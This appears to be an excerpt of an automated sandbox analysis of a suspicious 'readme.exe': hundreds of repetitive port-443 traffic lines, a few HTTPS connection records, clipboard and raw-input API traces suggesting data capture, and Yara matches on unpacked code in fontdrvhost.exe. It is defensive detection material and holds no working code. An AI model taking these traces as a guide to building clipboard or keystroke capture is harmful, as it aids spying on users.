                      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
                      Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49702 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.7:49751 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49842 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.190.177.22:443 -> 192.168.2.7:49841 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.190.177.22:443 -> 192.168.2.7:49849 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.190.177.22:443 -> 192.168.2.7:49883 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.7:49885 version: TLS 1.2
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 19_2_004D9AB0 GlobalAlloc,GlobalLock,GlobalUnlock,WideCharToMultiByte,GlobalAlloc,GlobalLock,GlobalUnlock,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,SetClipboardData,SetClipboardData,CloseClipboard,19_2_004D9AB0
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 19_2_004D9AB0 GlobalAlloc,GlobalLock,GlobalUnlock,WideCharToMultiByte,GlobalAlloc,GlobalLock,GlobalUnlock,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,SetClipboardData,SetClipboardData,CloseClipboard,19_2_004D9AB0
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_2_004D9AB0 GlobalAlloc,GlobalLock,GlobalUnlock,WideCharToMultiByte,GlobalAlloc,GlobalLock,GlobalUnlock,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,SetClipboardData,SetClipboardData,CloseClipboard,23_2_004D9AB0
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 19_2_004D9C20 OpenClipboard,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,CloseClipboard,19_2_004D9C20
                      Source: readme.exe, 00000017.00000003.1623131121.0000000002F50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_cd96d999-7
                      Source: readme.exe, 00000017.00000003.1623131121.0000000002F50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_f69cf8d9-9
                      Source: Yara matchFile source: 24.3.fontdrvhost.exe.4eb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.3.readme.exe.3170000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.3.fontdrvhost.exe.50d0000.7.raw.unpack, type: UNPACKEDPE
